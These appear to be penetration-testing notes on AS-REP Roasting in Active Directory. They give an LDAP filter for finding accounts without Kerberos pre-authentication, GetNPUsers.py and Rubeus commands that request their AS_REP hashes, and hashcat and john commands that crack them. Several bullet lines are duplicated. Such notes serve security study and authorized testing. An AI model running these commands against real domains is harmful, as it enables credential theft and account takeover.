2 ASREPRoast
- user with “Do not require Kerberos pre-authentication” enabled in AD that is disabled by default.
- allows anyone to send AS_REQ to KDC on the user’s behalf and receive AS_REP message that contains encrypted data with original user key derived from its password.
- Crack the hash to retrieve password.
- allows anyone to send AS_REQ to KDC on the user’s behalf and receive AS_REP message that contains encrypted data with original user key derived from its password.
- no domain accounts required; just connectivity to KDC (DC)
- however, with a domain account, users w/o Kerberos pre-auth in the domain can be retrieved via an LDAP query:
- (&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
- first parameter: request user accounts ONLY (no computer accounts)
- second parameter: filter by Kerberos pre-auth
- (&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
- however, with a domain account, users w/o Kerberos pre-auth in the domain can be retrieved via an LDAP query:
Tools: impacket’s GetNPUsers.py (Linux), Rubeus (Windows)
Linux
Note: -format flag presents the output file with the hash to be cracked using either hashcat or john
GetNPUsers.py DOMAIN/ -usersfile USERLIST -format hashcat -outputfile FILE
GetNPUsers.py DOMAIN/USERNAME:PASSWORD -request -format hashcat -outputfile FILE
Windows
Note: /format flag presents the output file with the hash to be cracked using either hashcat or john
.\Rubeus.exe asreproast /format:hashcat /outfile:FILE
Cracking the AS_REP / hash
hashcat
hashcat -m 18200 HASHFILE WORDLIST
john
john --wordlist=WORDLIST HASHFILE